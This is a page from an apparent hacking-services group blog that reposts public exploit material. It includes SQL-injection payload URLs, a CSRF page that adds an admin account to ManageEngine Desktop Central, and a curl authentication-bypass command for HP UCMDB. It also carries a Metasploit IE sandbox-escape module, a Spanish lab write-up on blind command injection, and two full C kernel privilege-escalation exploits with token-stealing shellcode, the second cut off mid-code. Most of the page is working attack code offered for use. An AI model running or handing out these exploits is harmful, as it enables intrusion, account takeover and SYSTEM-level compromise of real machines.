Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863117929

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/48878/info

Willscript Recipes website Script Silver Edition is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 

http://www.example.com/new_recipes/recipes/viewRecipe.php?recipeId=44
HireHackking 
<html>
<!--
# Exploit Title: ManageEngine Desktop Central 9 Add and admin user through Cross-Site Request Forgery (CSRF)
# Date: 05 December 2014
# Exploit Author: Mohamed Idris – Help AG Middle East
# Vendor Homepage: http://www.manageengine.com/
# Software Link: http://www.manageengine.com/products/desktop-central/
# Version: All versions below build 90121
# Tested on: Version 9 Build 90087
# CVEID: CVE-2014-9331
# Vulnerability Fix: http://www.manageengine.com/products/desktop-central/cve20149331-cross-site-request-forgery.html

POC Code:
When an authenticated application admin clicks a link to the below code, you well get a user “Hacker” with the password “HackerPass” added to the application (convincing the admin to click on a link is so easy ;)).
Remember to change the IP to the target server IP address in the code.
-->
  <!-- CSRF PoC - Add an admin account -->
  <body>
    <form action="http://<Server-IP>:8020/STATE_ID/1417736606982/roleMgmt.do?actionToCall=addUser&SUBREQUEST=XMLHTTP" method="POST">
      <input type="hidden" name="AuthenticationType" value="DC" />
      <input type="hidden" name="newDCAuthUserName" value="Hacker" />
      <input type="hidden" name="newDCAuthUserPassword" value="HackerPass" />
      <input type="hidden" name="DCAuthconfirmPassword" value="HackerPass" />
      <input type="hidden" name="newDCAuthUserEmail" value="" />
      <input type="hidden" name="newDCAuthUserPNumber" value="" />
      <input type="hidden" name="newADAuthUserEmail" value="" />
      <input type="hidden" name="newADAuthUserPNumber" value="" />
      <input type="hidden" name="MapType" value="ALL" />
      <input type="hidden" name="aduserSearch" value="" />
      <input type="hidden" name="searchValue" value="Search" />
      <input type="hidden" name="aduserSearchRO" value="" />
      <input type="hidden" name="searchValue" value="Search" />
      <input type="hidden" name="action1" value="DC_ADD_USER" />
      <input type="hidden" name="addUser" value="Add User" />
      <input type="hidden" name="cancle" value="Cancel" />
      <input type="hidden" name="customerids" value="" />
      <input type="hidden" name="roleListDCAuth" value="1" />
      <input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
      <input type="hidden" name="domainListADAuth" value="-1" />
      <input type="hidden" name="roleListADAuth" value="-1" />
      <input type="hidden" name="PERSONALISE_LANGUAGE" value="en_US" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
HireHackking 
Mogwai Security Advisory MSA-2015-02
----------------------------------------------------------------------
Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883
Product: Hewlett-Packard Universal CMDB (UCMDB)    
Affected versions: UCMDB 10.10 (Other versions might also be affected) 
Impact: high
Remote: yes
Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html
Reported: 14/11/2014 
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench) 


Vendor's Description of the Software:
----------------------------------------------------------------------
The HP Universal CMDB (UCMDB) automatically collects and manages accurate and
current business service definitions, associated infrastructure relationships and
detailed information on the assets, and is a central component in many of the key processes in your
IT organization, such as change management, asset management, service management, and business
service management. The UCMDB ensures that these processes can rely on comprehensive and
true data for all business services. Together with HP UCMDB Configuration Manager
(UCMDB-CM) you can standardize your IT environments, and make sure they comply with clear
policies, and defined authorization process.
Many IT organizations turn to a CMDB and configuration management processes to create a
shared single version of truth to support business service management, IT service management,
change management, and asset management initiatives. These initiatives help align IT efforts
with business requirements and run IT operations more efficiently and effectively.
The initiatives success depends on the CMDB providing a complete view into the
configuration items (CIs) and assets as well as how various IT elements relate together to deliver
the business service.
-----------------------------------------------------------------------

Business recommendation:
-----------------------------------------------------------------------
Apply configuration changes from HP 
https://softwaresupport.hp.com/group/softwaresupport/search-result/-/facetsearch/document/KM01351169


-- CVSS2 Ratings ------------------------------------------------------

CVSS Base Score: 6.4
Impact Subscore: 4.9
Exploitability Subscore: 10
CVSS v2 Vector (AV:N/AC:L/Au:N/C:P/I:P/A:N)
-----------------------------------------------------------------------


Vulnerability description:
----------------------------------------------------------------------
UCMB administrators heavily rely on a JMX-Console, which is installed by
default.
The JMX-Console web application in UCMDB performs access control only for 
the GET and POST methods, which allows remote attackers to send requests 
to this application's GET handler by using a different method (for example
HEAD).

The web.xml file of the JMX Console contains following security constrains:

<security-constraint>
<web-resource-collection>
<web-resource-name>Protected Pages</web-resource-name>
<url-pattern>/*</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
<auth-constraint>
<role-name>sysadmin</role-name>
</auth-constraint>
</security-constraint>

<security-constraint>
<web-resource-collection>
<web-resource-name>Callhome Servlet</web-resource-name>
<url-pattern>/callhome</url-pattern>
<http-method>GET</http-method>
<http-method>POST</http-method>
</web-resource-collection>
</security-constraint>

This vulnerability is identical with CVE-2010-0738 (JBoss JMX-Console 
Authentication bypass). This can be used to create a new account which 
can then be used to access the JMX console.


Proof of concept:
----------------------------------------------------------------------

The following Curl command will send a HEAD request to create a new user
"pocuser" in the UCMDB Backend:

curl -I
"http://foobar:8080/jmx-console/HtmlAdaptor?action=invokeOpByName&name=UCMDB%3Aservice%3DAuthorization+Services&methodName=createUser&arg0=&arg1=zdi-poc&arg2=pocuser&arg3=zdi-poc&arg4=pocuser"

Disclosure timeline:
----------------------------------------------------------------------
14/11/2014: Reporting issue to HP
18/11/2014: Re-Reporting, as no acknowledge received
18/11/2014: Acknowledge from HP
02/01/2015: Requesting status update from HP
29/01/2015: Requesting status update from HP
31/01/2015: Response from HP, they plan to release the advisory next week
02/05/2015: HP releases security bulletin
03/05/2015: Mogwai security bulletin release


Advisory URL:
----------------------------------------------------------------------
https://www.mogwaisecurity.de/#lab


References:
----------------------------------------------------------------------
Official HP security bulletin
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c04553906


----------------------------------------------------------------------
Mogwai, IT-Sicherheitsberatung Muench
Steinhoevelstrasse 2/2
89075 Ulm (Germany)

info@mogwaisecurity.de
HireHackking 
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Exploit::Powershell

  def initialize(info={})
    super(update_info(info, {
      'Name'           => 'MS15-004 Microsoft Remote Desktop Services Web Proxy IE Sandbox Escape',
      'Description'    => %q{
        This module abuses a process creation policy in Internet Explorer's sandbox, specifically
        the Microsoft Remote Desktop Services Web Proxy IE one, which allows the attacker to escape
        the Protected Mode, and execute code with Medium Integrity. At the moment, this module only
        bypass Protected Mode on Windows 7 SP1 and prior (32 bits). This module has been tested
        successfully on Windows 7 SP1 (32 bits) with IE 8 and IE 11.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Unknown', # From Threat Intel of Symantec
          'Henry Li', # Public vulnerability analysis
          'juan vazquez' # Metasploit module
        ],
      'Platform'       => 'win',
      'SessionTypes'   => ['meterpreter'],
      'Arch'           => [ARCH_X86],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread',
          'WfsDelay' => 30
        },
      'Targets'        =>
        [
          [ 'Protected Mode (Windows 7) / 32 bits',
            {
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'Payload'        =>
        {
          'Space'       => 4096,
          'DisableNops' => true
        },
      'References'     =>
        [
          ['CVE', '2015-0016'],
          ['MSB', 'MS15-004'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/cve-2015-0016-escaping-the-internet-explorer-sandbox/']
        ],
      'DisclosureDate' => 'Jan 13 2015'
    }))
  end

  def check
    temp = get_env('WINDIR')
    dll_path = "#{temp}\\System32\\TSWbPrxy.exe"

    win_ver = sysinfo['OS']

    unless win_ver =~ /Windows Vista|Windows 2008|Windows 2012|Windows [78]/
      return Exploit::CheckCode::Safe
    end

    unless file_exist?(dll_path)
      return Exploit::CheckCode::Safe
    end

    Exploit::CheckCode::Detected
  end

  def exploit
    print_status('Checking target...')
    unless check == Exploit::CheckCode::Detected
      fail_with(Failure::NotVulnerable, 'System not vulnerable')
    end

    if session.platform !~ /^x86\//
      fail_with(Failure::NotVulnerable, 'Sorry, this module currently only allows x86/win32 sessions at the moment')
    end

    win_ver = sysinfo['OS']
    if win_ver =~ /Windows 2012|Windows 8/
      fail_with(Failure::NotVulnerable, 'This module doesn\'t run on Windows 8/2012 at the moment')
    end

    print_status('Checking the Process Integrity Level...')

    unless get_integrity_level == INTEGRITY_LEVEL_SID[:low]
      fail_with(Failure::NotVulnerable, 'Not running at Low Integrity')
    end

    cmd = cmd_psh_payload(
      payload.encoded,
      payload_instance.arch.first,
      { :remove_comspec => true }
    )

    print_status('Storing payload on environment variable...')
    cmd.gsub!('powershell.exe ','')
    session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', cmd)

    print_status('Exploiting...')
    temp = get_env('TEMP')
    # Using the old meterpreter loader, if it's loaded with
    # Reflective DLL Injection the exceptions in the sandbox
    # policy won't apply.
    session.core.load_library(
      'LibraryFilePath' => ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-0016', 'cve-2015-0016.dll'),
      'TargetFilePath'  => temp +  '\\cve-2015-0016.dll',
      'UploadLibrary'   => true,
      'Extension'       => false,
      'SaveToDisk'      => false
    )
  end

  def cleanup
    session.railgun.kernel32.SetEnvironmentVariableA('PSHCMD', nil)
    super
  end

end
HireHackking

Joomla! Component com_virtualmoney 1.5 - SQL Injection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48883/info The 'com_virtualmoney' component for Joomla! is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. Virtual Money 1.5 is affected; other versions may also be vulnerable. www.example.com/index.php?option=com_virtualmoney&view=landpage&task=subcategory&catid=[EXPLOIT]
HireHackking
source: https://www.securityfocus.com/bid/48896/info Support Incident Tracker is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database. Support Incident Tracker 3.63p1 is vulnerable; other versions may also be affected. http://www.example.com/sit/billable_incidents.php?sites[]=-1 union select 1,concat_ws(':',user(),database())
HireHackking
En este post vamos a estar resolviendo el laboratorio de PortSwigger: “Blind OS command injection with time delays”.
Para resolver el laboratorio, tenemos que ocasionar un delay de tiempo de respuesta en el servidor de 10 segundos. Para ello, haremos uso del OS Command Injection que se encuentra en la función de feedback.
Por lo que nos dirigimos la botón de “Submit feedback”:
Como podemos observar, hay unos cuantos campos a rellenar. Por lo que vamos a rellenarlos:
Ahora, antes de enviar el feedback. Preparamos el burp suite para que reciba las peticiones:
Con esto listo, enviamos el feedback para captar la petición:
Esta es la petición que se envía al servidor cuando se envía feedback. Para tratar con ella, la enviamos al repeater pulsando Ctrl R:
Una vez en el repeater, podemos observar como una petición válida simplemente obtiene una respuesta de estado 200 y no mucho más.
Sin embargo, entre todo los parámetros que se están enviando, vamos a intentar ver si podemos ejecutar un comando en alguno de ellos:
En el campo del mensaje, podemos escapar un comando para que se ejecute y así causemos un delay de respuesta de 10 segundos en el servidor, que era lo que nos pedía el enunciado.
De esta forma, resolvemos el laboratorio:
HireHackking

MBoard 1.3 - 'url' Open Redirection

HACKER · %s · %s

source: https://www.securityfocus.com/bid/48902/info MBoard is prone to a URI-redirection vulnerability because the application fails to properly sanitize user-supplied input. A successful exploit may aid in phishing attacks; other attacks are possible. MBoard 1.3 is vulnerable; other versions may also be affected. http://www.example.com/go.php?url=http://example.com
HireHackking
/* Exploit Title - K7 Computing Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.k7computing.co.uk/ Tested Version - 14.2.0.240 Driver Version - 12.8.0.104 - K7Sentry.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/113007 CVE ID - CVE-2014-9643 Vendor fix url - none Fixed version - 14.2.0.253 Fixed driver ver - 12.8.0.118 */ #include <stdio.h> #include <windows.h> #define INBUFSIZE 4 #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef NTSTATUS (WINAPI *_NtAllocateVirtualMemory)( IN HANDLE ProcessHandle, IN OUT PVOID *BaseAddress, IN ULONG ZeroBits, IN OUT PULONG RegionSize, IN ULONG AllocationType, IN ULONG Protect); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); printf("[i] Kernel base address 0x%08x\n", kBase); HalDispatchTable = ((DWORD)Hal - (DWORD)Kernel + (DWORD)kBase); printf("[+] Kernel address of HalDispatchTable 0x%08x\n", HalDispatchTable); if(!HalDispatchTable) { printf("[-] Failed to calculate HalDispatchTable\n\n"); return -1; } return HalDispatchTable; } int GetWindowsVersion() { int v = 0; DWORD version = 0, minVersion = 0, majVersion = 0; version = GetVersion(); minVersion = (DWORD)(HIBYTE(LOWORD(version))); majVersion = (DWORD)(LOBYTE(LOWORD(version))); if (minVersion == 1 && majVersion == 5) v = 1; // "Windows XP; if (minVersion == 1 && majVersion == 6) v = 2; // "Windows 7"; if (minVersion == 2 && majVersion == 5) v = 3; // "Windows Server 2003; return v; } void spawnShell() { STARTUPINFOA si; PROCESS_INFORMATION pi; ZeroMemory(&pi, sizeof(pi)); ZeroMemory(&si, sizeof(si)); si.cb = sizeof(si); si.cb = sizeof(si); si.dwFlags = STARTF_USESHOWWINDOW; si.wShowWindow = SW_SHOWNORMAL; if (!CreateProcess(NULL, "cmd.exe", NULL, NULL, TRUE, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi)) { printf("\n[-] CreateProcess failed (%d)\n\n", GetLastError()); return; } CloseHandle(pi.hThread); CloseHandle(pi.hProcess); } int main(int argc, char *argv[]) { _NtAllocateVirtualMemory NtAllocateVirtualMemory; _NtQueryIntervalProfile NtQueryIntervalProfile; BYTE *inbuffer; NTSTATUS allocstatus; LPVOID base_addr = (LPVOID)0x00000001; DWORD size = BUFSIZE; DWORD written; int rwresult; unsigned char buffer[BUFSIZE]; HANDLE hDevice; DWORD dwRetBytes = 0; DWORD HalDispatchTableTarget; ULONG time = 0; unsigned char devhandle[MAX_PATH]; printf("-------------------------------------------------------------------------------\n"); printf(" K7 Computing Multiple Products (K7Sentry.sys) Arbitrary Write EoP Exploit \n"); printf(" Tested on Windows XP SP3 (32bit) \n"); printf("-------------------------------------------------------------------------------\n\n"); if (GetWindowsVersion() == 1) { printf("[i] Running Windows XP\n"); } if (GetWindowsVersion() == 0) { printf("[i] Exploit not supported on this OS\n\n"); return -1; } sprintf(devhandle, "\\\\.\\%s", "K7Sentry"); NtQueryIntervalProfile = (_NtQueryIntervalProfile)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryIntervalProfile"); if (!NtQueryIntervalProfile) { printf("[-] Unable to resolve NtQueryIntervalProfile\n\n"); return -1; } NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtAllocateVirtualMemory"); if (!NtAllocateVirtualMemory) { printf("[-] Unable to resolve NtAllocateVirtualMemory\n"); return -1; } allocstatus = NtAllocateVirtualMemory(INVALID_HANDLE_VALUE, &base_addr, 0, &size, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE); if (allocstatus) { printf("[-] An error occured while mapping executable memory. Status = 0x%08x\n", allocstatus); printf("Error : %d\n", GetLastError()); return -1; } printf("[+] NtAllocateVirtualMemory allocated memory at 0x%.8x\n", base_addr); memset(buffer, 0x90, BUFSIZE); memcpy(buffer+0x00000005, token_steal_xp, sizeof(token_steal_xp)); printf("[i] Size of shellcode %d bytes\n", sizeof(token_steal_xp)); rwresult = WriteProcessMemory(INVALID_HANDLE_VALUE, (LPVOID)0x00000001, buffer, BUFSIZE, &written); if (rwresult == 0) { printf("[-] An error occured while mapping writing memory: %d\n", GetLastError()); return -1; } printf("[+] WriteProcessMemory %d bytes written\n", written); hDevice = CreateFile(devhandle, GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING , 0, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] CreateFile open %s device failed (%d)\n\n", devhandle, GetLastError()); return -1; } else { printf("[+] Open %s device successful\n", devhandle); } inbuffer = VirtualAlloc(NULL, INBUFSIZE, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); memset(inbuffer, 0x41, INBUFSIZE); HalDispatchTableTarget = HalDispatchTableAddress() + sizeof(DWORD); printf("[+] HalDispatchTable+4 (0x%08x) will be overwritten\n", HalDispatchTableTarget); printf("[~] Press any key to send Exploit . . .\n"); getch(); DeviceIoControl(hDevice, 0x95002570, inbuffer, INBUFSIZE, (LPVOID)HalDispatchTableTarget, 0, &dwRetBytes, NULL); printf("[+] Buffer sent\n"); CloseHandle(hDevice); printf("[+] Spawning SYSTEM Shell\n"); NtQueryIntervalProfile(2, &time); spawnShell(); return 0; }
HireHackking

Pragyan CMS 3.0 - SQL Injection

HACKER · %s · %s

Advisory: SQL injection vulnerability in Pragyan CMS v.3.0 Advisory ID: SROEADV-2015-11 Author: Steffen Rösemann Affected Software: Pragyan CMS v.3 Vendor URL: https://github.com/delta/pragyan, http://delta.nitt.edu/ Vendor Status: vendor did not respond after initial communication CVE-ID: - ========================== Vulnerability Description: ========================== Pragyan CMS v. 3 suffers from a SQL injection vulnerability that can be abused even by unauthenticated attackers. ================== Technical Details: ================== The user-profile of registered users of Pragyan CMS v.3 is vulnerable to SQL injection attacks. A user-profile can be found in the following location of a common Pragyan CMS installation: http://{TARGET}/user:1 Exploit-Example: http:// {TARGET}/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+ ========= Solution: ========= Vendor notified, did not respond after initial communication. If you use Pragyan CMS v.3, please locate the file userprofile.lib.php and use my patch (see [5], usage at your own risk!). ==================== Disclosure Timeline: ==================== 18-Jan-2015 – found the vulnerability 19-Jan-2015 - informed the developers (see [3]) 19-Jan-2015 – release date of this security advisory [without technical details] 19-Jan-2015 - forked the project to keep it available/researchable in its current state for other researchers [4] 03-Feb-2015 - release date of this security advisory 03-Feb-2015 - provided a patch for vulnerability (see [5]) 03-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerability found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://delta.nitt.edu/ / https://github.com/delta/pragyan [2] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html [3] https://github.com/delta/pragyan/issues/206 [4] https://github.com/sroesemann/pragyan [5] http://pastebin.com/ip2gGYuS
HireHackking
/* Exploit Title - BullGuard Multiple Products Arbitrary Write Privilege Escalation Date - 04th February 2015 Discovered by - Parvez Anwar (@parvezghh) Vendor Homepage - http://www.bullguard.com/ Tested Version - 14.1.285.4 Driver Version - 1.0.0.6 - BdAgent.sys Tested on OS - 32bit Windows XP SP3 OSVDB - http://www.osvdb.org/show/osvdb/114478 CVE ID - CVE-2014-9642 Vendor fix url - http://www.bullguard.com/about/release-notes.aspx Fixed Version - 15.0.288.1 Fixed driver ver - 1.0.0.7 Note ---- Overwritten HAL dispatch table after exploit kd> dps nt!HalDispatchTable l c 8054ccb8 00000003 8054ccbc 00340000 8054ccc0 00010000 8054ccc4 0a060002 8054ccc8 ee657645 8054cccc 00000001 8054ccd0 00000001 8054ccd4 867c1bf0 8054ccd8 80613f7b nt!IoSetPartitionInformation 8054ccdc 806141ef nt!IoWritePartitionTable 8054cce0 8052d157 nt!CcHasInactiveViews 8054cce4 804e42d1 nt!ObpTraceDepth+0x19 7 pointers get overwritten. Since input buffer is in our control and pointers are static in XP I've triggered the overwrite again restoring the pointers. */ #include <stdio.h> #include <windows.h> #define BUFSIZE 4096 typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY { PVOID Unknown1; PVOID Unknown2; PVOID Base; ULONG Size; ULONG Flags; USHORT Index; USHORT NameLength; USHORT LoadCount; USHORT PathLength; CHAR ImageName[256]; } SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_INFORMATION_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION; typedef enum _SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemHandleInformation = 16 } SYSTEM_INFORMATION_CLASS; typedef NTSTATUS (WINAPI *_NtQuerySystemInformation)( SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); typedef NTSTATUS (WINAPI *_NtQueryIntervalProfile)( DWORD ProfileSource, PULONG Interval); typedef void (*FUNCTPTR)(); // Windows XP SP3 #define XP_KPROCESS 0x44 // Offset to _KPROCESS from a _ETHREAD struct #define XP_TOKEN 0xc8 // Offset to TOKEN from the _EPROCESS struct #define XP_UPID 0x84 // Offset to UniqueProcessId FROM the _EPROCESS struct #define XP_APLINKS 0x88 // Offset to ActiveProcessLinks _EPROCESS struct BYTE token_steal_xp[] = { 0x52, // push edx Save edx on the stack 0x53, // push ebx Save ebx on the stack 0x33,0xc0, // xor eax, eax eax = 0 0x64,0x8b,0x80,0x24,0x01,0x00,0x00, // mov eax, fs:[eax+124h] Retrieve ETHREAD 0x8b,0x40,XP_KPROCESS, // mov eax, [eax+XP_KPROCESS] Retrieve _KPROCESS 0x8b,0xc8, // mov ecx, eax 0x8b,0x98,XP_TOKEN,0x00,0x00,0x00, // mov ebx, [eax+XP_TOKEN] Retrieves TOKEN 0x8b,0x80,XP_APLINKS,0x00,0x00,0x00, // mov eax, [eax+XP_APLINKS] <-| Retrieve FLINK from ActiveProcessLinks 0x81,0xe8,XP_APLINKS,0x00,0x00,0x00, // sub eax, XP_APLINKS | Retrieve _EPROCESS Pointer from the ActiveProcessLinks 0x81,0xb8,XP_UPID,0x00,0x00,0x00,0x04,0x00,0x00,0x00, // cmp [eax+XP_UPID], 4 | Compares UniqueProcessId with 4 (System Process) 0x75,0xe8, // jne ---- 0x8b,0x90,XP_TOKEN,0x00,0x00,0x00, // mov edx, [eax+XP_TOKEN] Retrieves TOKEN and stores on EDX 0x8b,0xc1, // mov eax, ecx Retrieves KPROCESS stored on ECX 0x89,0x90,XP_TOKEN,0x00,0x00,0x00, // mov [eax+XP_TOKEN], edx Overwrites the TOKEN for the current KPROCESS 0x5b, // pop ebx Restores ebx 0x5a, // pop edx Restores edx 0xc2,0x08 // ret 8 Away from the kernel }; BYTE restore_pointers_xp[] = // kd> dps nt!HalDispatchTable "\xf2\xa3\x6f\x80" // 8054ccbc 806fa3f2 hal!HaliQuerySystemInformation "\xce\xa3\x6f\x80" // 8054ccc0 806fa3ce hal!HaliSetSystemInformation "\x0b\x46\x61\x80" // 8054ccc4 8061460b nt!xHalQueryBusSlots "\x00\x00\x00\x00" // 8054ccc8 00000000 "\x4d\xac\x50\x80" // 8054cccc 8050ac4d nt!HalExamineMBR "\x89\x6f\x5c\x80" // 8054ccd0 805c6f89 nt!IoAssignDriveLetters "\xe5\x4a\x5c\x80"; // 8054ccd4 805c4ae5 nt!IoReadPartitionTable DWORD HalDispatchTableAddress() { _NtQuerySystemInformation NtQuerySystemInformation; PSYSTEM_MODULE_INFORMATION pModuleInfo; DWORD HalDispatchTable; CHAR kFullName[256]; PVOID kBase = NULL; LPSTR kName; HMODULE Kernel; FUNCTPTR Hal; ULONG len; NTSTATUS status; NtQuerySystemInformation = (_NtQuerySystemInformation)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQuerySystemInformation"); if (!NtQuerySystemInformation) { printf("[-] Unable to resolve NtQuerySystemInformation\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &len); if (!status) { printf("[-] An error occured while reading NtQuerySystemInformation. Status = 0x%08x\n\n", status); return -1; } pModuleInfo = (PSYSTEM_MODULE_INFORMATION)GlobalAlloc(GMEM_ZEROINIT, len); if(pModuleInfo == NULL) { printf("[-] An error occurred with GlobalAlloc for pModuleInfo\n\n"); return -1; } status = NtQuerySystemInformation(SystemModuleInformation, pModuleInfo, len, &len); memset(kFullName, 0x00, sizeof(kFullName)); strcpy_s(kFullName, sizeof(kFullName)-1, pModuleInfo->Module[0].ImageName); kBase = pModuleInfo->Module[0].Base; printf("[i] Kernel base name %s\n", kFullName); kName = strrchr(kFullName, '\\'); Kernel = LoadLibraryA(++kName); if(Kernel == NULL) { printf("[-] Failed to load kernel base\n\n"); return -1; } Hal = (FUNCTPTR)GetProcAddress(Kernel, "HalDispatchTable"); if(Hal == NULL) { printf("[-] Failed to find HalDispatchTable\n\n"); return -1; } printf("[i] HalDispatchTable address 0x%08x\n", Hal); printf("[i] Kernel handle 0x%08x\n", Kernel); 